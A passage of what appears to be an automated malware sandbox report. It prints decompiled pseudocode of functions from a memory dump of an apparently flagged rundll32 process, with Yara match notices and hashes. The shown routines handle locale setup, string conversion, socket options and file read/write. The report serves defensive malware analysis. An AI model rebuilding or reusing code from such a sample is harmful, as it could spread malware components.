				 *((long long*)( *((intOrPtr*)( *_t229 + 4)) + _t229)) = 0x206401d8;
				 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4)) + _t229 - 4)) =  *((intOrPtr*)( *_t229 + 4)) - 0x10;
				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0x20640120;
				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x20;
				 *((long long*)( *((intOrPtr*)( *_t243 + 4)) + _t243)) = 0x206401b0;
				 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 4)) + _t243 - 4)) =  *((intOrPtr*)( *_t243 + 4)) - 0x98;
				 *((long long*)(_t232 + 0x88)) = _t221;
				 *_t221 = 0x20640040;
				E00000215215205F4DCC(0x20640040,  *((intOrPtr*)( *_t243 + 4)));
				E00000215215205D6CC8(1, 0x20640040, _t225,  *_t155);
				 *0x21520640048 = 0x20640040;
				 *((long long*)(_t221 + 0x60)) = 0x20640040;
				 *((long long*)(_t221 + 0x18)) = _t221 + 8;
				_t209 = _t221 + 0x10;
				 *((long long*)(_t221 + 0x20)) = _t209;
				 *((long long*)(_t221 + 0x38)) = _t221 + 0x28;
				 *((long long*)(_t221 + 0x40)) = _t221 + 0x30;
				 *(_t221 + 0x50) = _t221 + 0x48;
				 *(_t221 + 0x58) = _t221 + 0x4c;
				 *_t209 = _t240;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) = _t240;
				 *( *(_t221 + 0x58)) = r12d;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = _t240;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
				 *( *(_t221 + 0x50)) = r12d;
				 *_t221 = 0x20640130;
				_t226 =  *((intOrPtr*)(_t246 + 0x10));
				if ( *((long long*)(_t246 + 0x18)) - 0x10 < 0) goto 0x205c8841;
				 *((long long*)(_t221 + 0x68)) = _t240;
				 *(_t221 + 0x70) = r12d;
				if (_t226 == 0) goto 0x205c88e1;
				r8b = 1;
				E0000021521520586110(_t226,  *_t199);
				_t116 = E00000215215205F7310(1, __edi, __esi, _t137, 0x20640130,  *_t246, _t221, _t226, _t226);
				_t237 = 0x20640130 + _t226;
				 *((long long*)(_t221 + 0x68)) = _t237;
				if (( *(_t221 + 0x70) & 0x00000004) != 0) goto 0x205c8895;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0x20640130;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = 0x20640130;
				 *( *(_t221 + 0x50)) = __esi;
				if (( *(_t221 + 0x70) & 0x00000002) != 0) goto 0x205c88dd;
				_t219 =  !=  ? _t237 : 0x20640130;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x20)))) = 0x20640130;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x40)))) =  !=  ? _t237 : 0x20640130;
				 *( *(_t221 + 0x58)) = _t117 - 1 + __esi;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t221 + 0x38)))) != _t240) goto 0x205c88dd;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x18)))) = 0x20640130;
				 *((long long*)( *((intOrPtr*)(_t221 + 0x38)))) = _t240;
				 *( *(_t221 + 0x50)) = _t117;
				 *(_t221 + 0x70) =  *(_t221 + 0x70) | 0x00000001;
				return _t116;
			}































                0x215205c85ec
                0x215205c85ec
                0x215205c85ec
                0x215205c85ef
                0x215205c85f3
                0x215205c8601
                0x215205c8605
                0x215205c860d
                0x215205c8610
                0x215205c8613
                0x215205c8616
                0x215205c8621
                0x215205c8624
                0x215205c862f
                0x215205c863a
                0x215205c8641
                0x215205c8657
                0x215205c8665
                0x215205c866a
                0x215205c866e
                0x215205c8675
                0x215205c8678
                0x215205c867c
                0x215205c8680
                0x215205c8684
                0x215205c868b
                0x215205c8693
                0x215205c8697
                0x215205c869b
                0x215205c869f
                0x215205c86a7
                0x215205c86b1
                0x215205c86b6
                0x215205c86bb
                0x215205c86c0
                0x215205c86c4
                0x215205c86c8
                0x215205c86cc
                0x215205c86d0
                0x215205c86dc
                0x215205c86e5
                0x215205c86ed
                0x215205c86f5
                0x215205c86fa
                0x215205c8700
                0x215205c870d
                0x215205c871b
                0x215205c8722
                0x215205c872a
                0x215205c8730
                0x215205c8736
                0x215205c874d
                0x215205c875c
                0x215205c876e
                0x215205c877c
                0x215205c878f
                0x215205c87a0
                0x215205c87a5
                0x215205c87b4
                0x215205c87bc
                0x215205c87c6
                0x215205c87cb
                0x215205c87cf
                0x215205c87d7
                0x215205c87db
                0x215205c87df
                0x215205c87e7
                0x215205c87ef
                0x215205c87f7
                0x215205c87ff
                0x215205c8803
                0x215205c880a
                0x215205c8811
                0x215205c8818
                0x215205c881f
                0x215205c8826
                0x215205c8830
                0x215205c8833
                0x215205c883c
                0x215205c8841
                0x215205c8845
                0x215205c884c
                0x215205c8852
                0x215205c885d
                0x215205c886e
                0x215205c8873
                0x215205c8877
                0x215205c887f
                0x215205c8885
                0x215205c888c
                0x215205c8893
                0x215205c8899
                0x215205c88a2
                0x215205c88aa
                0x215205c88b1
                0x215205c88be
                0x215205c88c7
                0x215205c88cd
                0x215205c88d4
                0x215205c88db
                0x215205c88dd
                0x215205c88f2

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_$ExceptionLocimpLocimp::_New_SetgloballocaleThrow
                • String ID:
                • API String ID: 2644447982-0
                • Opcode ID: 529956d84b6958c2e22c1e37415a335ac7025e49015a27c9e993c32f8a750d7f
                • Instruction ID: 53b2865265c98f21b224685aceda020d03b7e2aa072812a48cf9bbf1087745cc
                • Opcode Fuzzy Hash: 529956d84b6958c2e22c1e37415a335ac7025e49015a27c9e993c32f8a750d7f
                • Instruction Fuzzy Hash: 45A13533202F54D6DB24CF26E58869C77A8FB98B94B518626CF9E43B64DF39E465C300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520595120 Relevance: 6.2, APIs: 4, Instructions: 185networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionCreateErrorLastPortSocketsetsockopt
                • String ID:
                • API String ID: 1324823626-0
                • Opcode ID: 4c445b2fc41ed5aa158aa1a4ef54fd076451617574ec4d2ce6ba46319e11291c
                • Instruction ID: fbee68c8635dbed3c2e3113a3d09e9de76b29aca5833e12c416cfa79f3cf0d3e
                • Opcode Fuzzy Hash: 4c445b2fc41ed5aa158aa1a4ef54fd076451617574ec4d2ce6ba46319e11291c
                • Instruction Fuzzy Hash: 6A819D33A11F64CAEB10CF71D9443AD37B0FBA97A8F005B45DEA916B89DB7485A4C780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152058F5A0 Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                Download Yara Rule
                C-Code - Quality: 38%
                			E000002152152058F5A0(int __edx, void* __ebp, long long __rbx, char* __rcx, void* __rdx, void* __r8, void* _a16, void* _a24, long long _a32) {
				long long _v48;
				long long _v56;
				char _v72;
				long long _v80;
				intOrPtr _v88;
				long long _v96;
				long long _v104;
				intOrPtr _v112;
				long long _v120;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t60;
				void* _t63;
				int _t115;
				void* _t123;
				void* _t125;
				long long _t126;
				int _t129;
				char* _t130;
				short* _t132;
				int _t134;
				void* _t137;
				intOrPtr _t142;
				char _t144;
				void* _t145;
				int _t146;
				long long _t149;

				_t121 = __rdx;
				_t145 = _t137;
				 *((long long*)(_t145 + 8)) = __rcx;
				_v80 = 0xfffffffe;
				 *((long long*)(_t145 + 0x10)) = __rbx;
				_t130 = __rcx;
				r15d = 0;
				_v88 = r15d;
				_a24 = _t149;
				 *((long long*)(_t145 - 0x68)) = _t149;
				 *((intOrPtr*)(_t145 - 0x70)) = r15d;
				 *((long long*)(_t145 - 0x78)) =  &_a24;
				r9d = 0x400;
				r8d = __edx;
				if (FormatMessageW(??, ??, ??, ??, ??, ??, ??) != 0) goto 0x2058f612;
				E000002152152058F510(__edx, FormatMessageW(??, ??, ??, ??, ??, ??, ??),  &_a24, __rbx, __rcx, __rdx, _t132, _t149);
				_v88 = 1;
				goto 0x2058f7aa;
				_t108 = _a24;
				_a32 = _a24;
				_v96 = _t149;
				_v104 = _t149;
				_v112 = r15d;
				_v120 = _t149;
				r9d = r9d | 0xffffffff;
				if (WideCharToMultiByte(_t146, _t129, _t132, _t134) != 0) goto 0x2058f65d;
				E000002152152058F510(__edx, WideCharToMultiByte(_t146, _t129, _t132, _t134),  &_a24, _a24, _t130, _t121, _t132);
				_v88 = 1;
				goto 0x2058f7a1;
				_v56 = _t149;
				_v48 = _t149;
				_v48 = 0xf;
				_v56 = _t149;
				_v72 = 0;
				r8d = 0;
				E000002152152059CDF0(_a24,  &_v72, _t57, _t132);
				_t97 =  >=  ? _v72 :  &_v72;
				_v96 = _t149;
				_v104 = _t149;
				_v112 = r14d;
				_v120 =  >=  ? _v72 :  &_v72;
				r9d = r9d | 0xffffffff;
				_t142 = _a24;
				_t60 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r8d = _t60;
				if (_t60 != 0) goto 0x2058f6cf;
				E000002152152058F510(__edx, _t60,  >=  ? _v72 :  &_v72, _a24, _t130, _t57, _t132);
				goto 0x2058f790;
				r8d = r8d - 1;
				_t115 = r8d;
				_t144 = _v72;
				if (r8d <= 0) goto 0x2058f744;
				asm("o16 nop [eax+eax]");
				_t99 =  >=  ? _t144 :  &_v72;
				_t123 = _t115 - 1;
				if ( *((char*)(_t123 + ( >=  ? _t144 :  &_v72))) == 0xa) goto 0x2058f719;
				_t101 =  >=  ? _t144 :  &_v72;
				if ( *((char*)(( >=  ? _t144 :  &_v72) + _t115 - 1)) != 0xd) goto 0x2058f724;
				r8d = r8d - 1;
				if (_t123 > 0) goto 0x2058f6f0;
				if (r8d <= 0) goto 0x2058f744;
				_t125 =  >=  ? _t144 :  &_v72;
				_t42 = _t142 - 1; // -3
				r8d =  ==  ? _t42 : r8d;
				_t126 = r8d;
				if (_t126 - _v56 > 0) goto 0x2058f766;
				_v56 = _t126;
				_t105 =  >=  ? _t144 :  &_v72;
				 *((char*)(( >=  ? _t144 :  &_v72) + _t126)) = 0;
				goto 0x2058f775;
				r8d = 0;
				E0000021521520586D70(_a24,  &_v72, _t126 - ( >=  ? _t144 :  &_v72), _t130, _t137);
				 *((long long*)(_t130 + 0x18)) = 0xf;
				 *((long long*)(_t130 + 0x10)) = _t149;
				 *_t130 = 0;
				_t63 = E0000021521520586E80(_t108, _t130,  &_v72);
				_v88 = 1;
				E0000021521520586820(_t63, _t42,  &_v72);
				return LocalFree(??);
			}































                0x2152058f5a0
                0x2152058f5a0
                0x2152058f5a3
                0x2152058f5b5
                0x2152058f5bd
                0x2152058f5c3
                0x2152058f5c6
                0x2152058f5c9
                0x2152058f5cd
                0x2152058f5d1
                0x2152058f5d5
                0x2152058f5dd
                0x2152058f5e1
                0x2152058f5e7
                0x2152058f5f9
                0x2152058f600
                0x2152058f606
                0x2152058f60d
                0x2152058f612
                0x2152058f616
                0x2152058f61a
                0x2152058f61f
                0x2152058f624
                0x2152058f629
                0x2152058f62e
                0x2152058f645
                0x2152058f64c
                0x2152058f651
                0x2152058f658
                0x2152058f65d
                0x2152058f661
                0x2152058f665
                0x2152058f66d
                0x2152058f671
                0x2152058f678
                0x2152058f67f
                0x2152058f68e
                0x2152058f693
                0x2152058f698
                0x2152058f69d
                0x2152058f6a2
                0x2152058f6a7
                0x2152058f6ab
                0x2152058f6b3
                0x2152058f6b9
                0x2152058f6be
                0x2152058f6c5
                0x2152058f6ca
                0x2152058f6cf
                0x2152058f6d2
                0x2152058f6d9
                0x2152058f6e0
                0x2152058f6e6
                0x2152058f6f8
                0x2152058f6fc
                0x2152058f704
                0x2152058f70e
                0x2152058f717
                0x2152058f719
                0x2152058f722
                0x2152058f727
                0x2152058f731
                0x2152058f735
                0x2152058f740
                0x2152058f744
                0x2152058f74e
                0x2152058f750
                0x2152058f75c
                0x2152058f760
                0x2152058f764
                0x2152058f769
                0x2152058f770
                0x2152058f775
                0x2152058f77d
                0x2152058f781
                0x2152058f78b
                0x2152058f790
                0x2152058f79b
                0x2152058f7c0

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharFormatFreeLocalMessageMultiWide
                • String ID:
                • API String ID: 2906450291-0
                • Opcode ID: 7817812f2f4c45c696f8fc2488192bd5a3126306da22d2aa533c5870e1c94d58
                • Instruction ID: 46e30b579c64da81ba89882c409de297729b9b3b6b9db13049a50f6ffa6c9cd7
                • Opcode Fuzzy Hash: 7817812f2f4c45c696f8fc2488192bd5a3126306da22d2aa533c5870e1c94d58
                • Instruction Fuzzy Hash: D151CC33721BA0CAFB208F65E8487DD27F5FB98B88F504624DE5913B99EB38C4808710
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520591DF0 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                Download Yara Rule
                C-Code - Quality: 15%
                			E0000021521520591DF0(long long __rax, long long __rbx, long long __rcx, signed char* __rdx, long long __rsi, void* __r9, void* __r10, long long __r13, intOrPtr _a8, long long _a16, long long _a24, long long _a32) {
				char _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				intOrPtr _v104;
				signed char _t40;
				void* _t42;
				void* _t55;
				long long _t80;
				long long _t81;
				long long _t105;
				long long _t106;
				long long _t107;
				long long _t119;
				void* _t124;

				_t105 = __rsi;
				_t83 = __rbx;
				_t80 = __rax;
				r12d = 0;
				_t124 = __r9;
				if (__rcx == 0xffffffff) goto 0x20591fd9;
				_a16 = __rbx;
				if (r8b == 0) goto 0x20591e6e;
				_t40 =  *__rdx & 0x000000ff;
				if ((_t40 & 0x00000008) == 0) goto 0x20591e6e;
				_a8 = r12d;
				_v88 = __rcx;
				_v80 = __rcx;
				 *__rdx = _t40 | 0x00000008;
				_v72 = _t119;
				r8d = 0x80;
				_v104 = 4;
				__imp__#21();
				_t42 = E0000021521520591CE0(0xff00 | (_t40 | 0x00000008) != 0x00000000, __rbx,  &_v88, __rdx, __rsi);
				__imp__#3();
				E0000021521520591CE0((0xff00 | (_t40 | 0x00000008) != 0x00000000) & 0xffffff00 | _t42 != 0x00000000, _t83, __r9, __rdx, _t105);
				if (_t42 == 0) goto 0x20591fd5;
				_a24 = _t105;
				_a32 = __r13;
				E000002152152058F380(__r9, __rdx);
				_t106 = _t80;
				_v88 = _t80;
				_v80 = _t80;
				if ( *((intOrPtr*)(_t106 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591ed8;
				 *((intOrPtr*)( *_t106 + 0x30))();
				goto 0x20591eda;
				_t21 =  &_v64; // 0x4d54ee85da812018
				_t81 = _t80 + 2;
				_v88 = 0x2733;
				_v72 = _t81;
				_t93 = __r9;
				asm("movsd xmm1, [ebp-0x20]");
				_v80 = _t106;
				asm("movups xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x8], xmm1");
				asm("movups [ebp-0x18], xmm0");
				if (E0000021521520590200(_t83, __r9, _t21) != 0) goto 0x20591f7c;
				E000002152152058F380(_t93, _t21);
				_t107 = _t81;
				_v88 = _t81;
				_v80 = _t81;
				if ( *((intOrPtr*)(_t107 + 8)) + 0xda812030 - 1 <= 0) goto 0x20591f42;
				 *((intOrPtr*)( *_t107 + 0x30))();
				goto 0x20591f44;
				_t29 =  &_v64; // 0x4d54ee85da812018
				_v88 = 0x4d5;
				_v72 = _t81 + 2;
				asm("movsd xmm1, [ebp-0x20]");
				_v80 = _t107;
				asm("movups xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x8], xmm1");
				asm("movups [ebp-0x18], xmm0");
				_t55 = E0000021521520590200(_t83, _t124, _t29);
				if (_t55 == 0) goto 0x20591fae;
				_a8 = r12d;
				__imp__#10();
				 *__rdx =  *__rdx & 0x000000fc;
				__imp__#3();
				E0000021521520591CE0(0x80046600 | _t55 != 0x00000000, _t83, _t124, _t29, _t107);
				return _t55;
			}


















                0x21520591df0
                0x21520591df0
                0x21520591df0
                0x21520591e00
                0x21520591e03
                0x21520591e10
                0x21520591e16
                0x21520591e21
                0x21520591e23
                0x21520591e28
                0x21520591e2c
                0x21520591e32
                0x21520591e36
                0x21520591e3e
                0x21520591e48
                0x21520591e4c
                0x21520591e52
                0x21520591e5a
                0x21520591e69
                0x21520591e71
                0x21520591e81
                0x21520591e88
                0x21520591e8e
                0x21520591e96
                0x21520591e9e
                0x21520591ea3
                0x21520591eb2
                0x21520591eb6
                0x21520591ec5
                0x21520591ed2
                0x21520591ed6
                0x21520591edd
                0x21520591ee1
                0x21520591ee5
                0x21520591eec
                0x21520591ef0
                0x21520591ef3
                0x21520591ef8
                0x21520591efc
                0x21520591f00
                0x21520591f05
                0x21520591f10
                0x21520591f12
                0x21520591f17
                0x21520591f1c
                0x21520591f20
                0x21520591f2f
                0x21520591f3c
                0x21520591f40
                0x21520591f47
                0x21520591f4f
                0x21520591f56
                0x21520591f5d
                0x21520591f62
                0x21520591f66
                0x21520591f6a
                0x21520591f6f
                0x21520591f73
                0x21520591f7a
                0x21520591f80
                0x21520591f8c
                0x21520591f92
                0x21520591f99
                0x21520591fa9
                0x21520591fd4

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: closesocket$ioctlsocketsetsockopt
                • String ID:
                • API String ID: 566113833-0
                • Opcode ID: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction ID: 05818bf60718d8ed1cfe4841d1066a0bb46d556f6e3514066d49de248f247fdf
                • Opcode Fuzzy Hash: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction Fuzzy Hash: 9051E133B11F748AEB50CF75A8843EE23B4BB99B88F004155EE8957B89DF3880958754
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520603B0C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 92%
                			E0000021521520603B0C(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
				void* _v8;
				char _v16;
				intOrPtr* _v32;
				char _v40;
				void* __rdi;
				void* _t17;
				intOrPtr* _t43;
				void* _t55;

				_a8 = __rbx;
				_a24 = __rsi;
				_a32 = r9w;
				_t55 = __rdx;
				if (__rdx != 0) goto 0x20603b42;
				if (__r8 == 0) goto 0x20603b42;
				if (__rcx == 0) goto 0x20603b3b;
				 *__rcx =  *__rcx & __edx;
				goto 0x20603bd1;
				if (__rcx == 0) goto 0x20603b4a;
				 *__rcx =  *__rcx | 0xffffffff;
				if (__r8 - 0x7fffffff <= 0) goto 0x20603b66;
				_t17 = E0000021521520603944(__rax);
				 *__rax = 0x16;
				E00000215215205FAABC(_t17);
				goto 0x20603bcf;
				E00000215215205FA5D4(__rax, __rcx,  &_v40, _a40);
				_t43 = _v32;
				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0x20603c00;
				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0x20603be3;
				if (_t55 == 0) goto 0x20603bb0;
				if (__r8 == 0) goto 0x20603bb0;
				E00000215215205F8EF0(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
				E0000021521520603944(_t43);
				 *_t43 = 0x2a;
				if (_v16 == 0) goto 0x20603bcf;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				return 0x2a;
			}











                0x21520603b0c
                0x21520603b11
                0x21520603b16
                0x21520603b24
                0x21520603b2d
                0x21520603b32
                0x21520603b37
                0x21520603b39
                0x21520603b3d
                0x21520603b45
                0x21520603b47
                0x21520603b51
                0x21520603b53
                0x21520603b5d
                0x21520603b5f
                0x21520603b64
                0x21520603b73
                0x21520603b78
                0x21520603b85
                0x21520603b97
                0x21520603b9c
                0x21520603ba1
                0x21520603bab
                0x21520603bb0
                0x21520603bba
                0x21520603bc1
                0x21520603bc8
                0x21520603be2

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                • String ID:
                • API String ID: 4141327611-0
                • Opcode ID: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction ID: a72b9a5096da18b86ce023cf783f4992ba7a6aba279cd1531858e2b2ec3b55b1
                • Opcode Fuzzy Hash: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction Fuzzy Hash: 7741B53324AA70C6FB759B1190883EAB69AFFF0B95F3841A09E5546ADDDB3CD8458700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205B9A80 Relevance: 6.1, APIs: 4, Instructions: 75threadfileCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00000215215205B9A80(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
				int _t34;
				long _t35;
				void* _t39;
				long long _t73;
				void* _t85;
				void* _t86;

				_a16 = __rbx;
				_a32 = __rdi;
				_a24 = __r8;
				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0x205b9aaf;
				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
				goto 0x205b9ac1;
				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0x205b9ac1;
				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
				asm("lock inc dword [eax+0x30]");
				if ( *__rdx != 0xffffffff) goto 0x205b9af6;
				r9d = 0;
				r8d = 0x2719;
				_pop(_t85);
				goto E00000215215205B9130;
				if ( *((long long*)(_t85 + 8)) != 0) goto 0x205b9b21;
				r9d = 0;
				r8d = 0;
				_pop(_t86);
				goto E00000215215205B9130;
				_a120 = __rsi;
				_t73 = _a152;
				_a136 = 0;
				_a88 = _t73;
				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
				r8d =  *(_t86 + 8);
				_t34 = WriteFile(??, ??, ??, ??, ??);
				_t35 = GetLastError();
				if (_t34 != 0) goto 0x205b9b7f;
				if (_t35 == 0x3e5) goto 0x205b9b7f;
				if (_t35 == 0xea) goto 0x205b9b7f;
				r9d = _a136;
				r8d = _t35;
				E00000215215205B9130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
				goto 0x205b9b8b;
				return E00000215215205B9090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
			}









                0x215205b9a80
                0x215205b9a85
                0x215205b9a8a
                0x215205b9aa2
                0x215205b9aaa
                0x215205b9aad
                0x215205b9ab8
                0x215205b9aba
                0x215205b9ac5
                0x215205b9acd
                0x215205b9ad4
                0x215205b9adb
                0x215205b9aef
                0x215205b9af1
                0x215205b9afb
                0x215205b9b02
                0x215205b9b09
                0x215205b9b1a
                0x215205b9b1c
                0x215205b9b23
                0x215205b9b28
                0x215205b9b32
                0x215205b9b36
                0x215205b9b3b
                0x215205b9b3f
                0x215205b9b49
                0x215205b9b51
                0x215205b9b59
                0x215205b9b60
                0x215205b9b67
                0x215205b9b69
                0x215205b9b6e
                0x215205b9b78
                0x215205b9b7d
                0x215205b9ba0

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CurrentThread$ErrorFileLastWrite
                • String ID:
                • API String ID: 1327375210-0
                • Opcode ID: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction ID: 54ab56887dd87e8348d2fbd6e90ff179ce3cb538b258ec76d9d9b75567c774ce
                • Opcode Fuzzy Hash: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction Fuzzy Hash: EF315E37709EA0C6E720DB26E44875AB7A0FBA9BE4F144252DF5947B9CCB38E451CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205B9BB0 Relevance: 6.1, APIs: 4, Instructions: 75threadfileCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00000215215205B9BB0(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
				int _t34;
				long _t35;
				void* _t39;
				long long _t73;
				void* _t85;
				void* _t86;

				_a16 = __rbx;
				_a32 = __rdi;
				_a24 = __r8;
				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0x205b9bdf;
				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
				goto 0x205b9bf1;
				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0x205b9bf1;
				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
				asm("lock inc dword [eax+0x30]");
				if ( *__rdx != 0xffffffff) goto 0x205b9c26;
				r9d = 0;
				r8d = 0x2719;
				_pop(_t85);
				goto E00000215215205B9130;
				if ( *((long long*)(_t85 + 8)) != 0) goto 0x205b9c51;
				r9d = 0;
				r8d = 0;
				_pop(_t86);
				goto E00000215215205B9130;
				_a120 = __rsi;
				_t73 = _a152;
				_a136 = 0;
				_a88 = _t73;
				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
				r8d =  *(_t86 + 8);
				_t34 = ReadFile(??, ??, ??, ??, ??);
				_t35 = GetLastError();
				if (_t34 != 0) goto 0x205b9caf;
				if (_t35 == 0x3e5) goto 0x205b9caf;
				if (_t35 == 0xea) goto 0x205b9caf;
				r9d = _a136;
				r8d = _t35;
				E00000215215205B9130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
				goto 0x205b9cbb;
				return E00000215215205B9090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
			}









                0x215205b9bb0
                0x215205b9bb5
                0x215205b9bba
                0x215205b9bd2
                0x215205b9bda
                0x215205b9bdd
                0x215205b9be8
                0x215205b9bea
                0x215205b9bf5
                0x215205b9bfd
                0x215205b9c04
                0x215205b9c0b
                0x215205b9c1f
                0x215205b9c21
                0x215205b9c2b
                0x215205b9c32
                0x215205b9c39
                0x215205b9c4a
                0x215205b9c4c
                0x215205b9c53
                0x215205b9c58
                0x215205b9c62
                0x215205b9c66
                0x215205b9c6b
                0x215205b9c6f
                0x215205b9c79
                0x215205b9c81
                0x215205b9c89
                0x215205b9c90
                0x215205b9c97
                0x215205b9c99
                0x215205b9c9e
                0x215205b9ca8
                0x215205b9cad
                0x215205b9cd0

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CurrentThread$ErrorFileLastRead
                • String ID:
                • API String ID: 895653707-0
                • Opcode ID: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction ID: f98ac8d3ed932f290e1fcc8ca88b2eab72ba2df2150af1d64797a7d2a95bf059
                • Opcode Fuzzy Hash: 247f43cfc954d39203f53dc2233411e47b8fdd5f97424ed2fa319d8570cd04a2
                • Instruction Fuzzy Hash: A3314F33719EA0C6E7209B26E44875AB7A0FB99BE4F144652DF5947B9CCB38E491CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C8328 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 60%
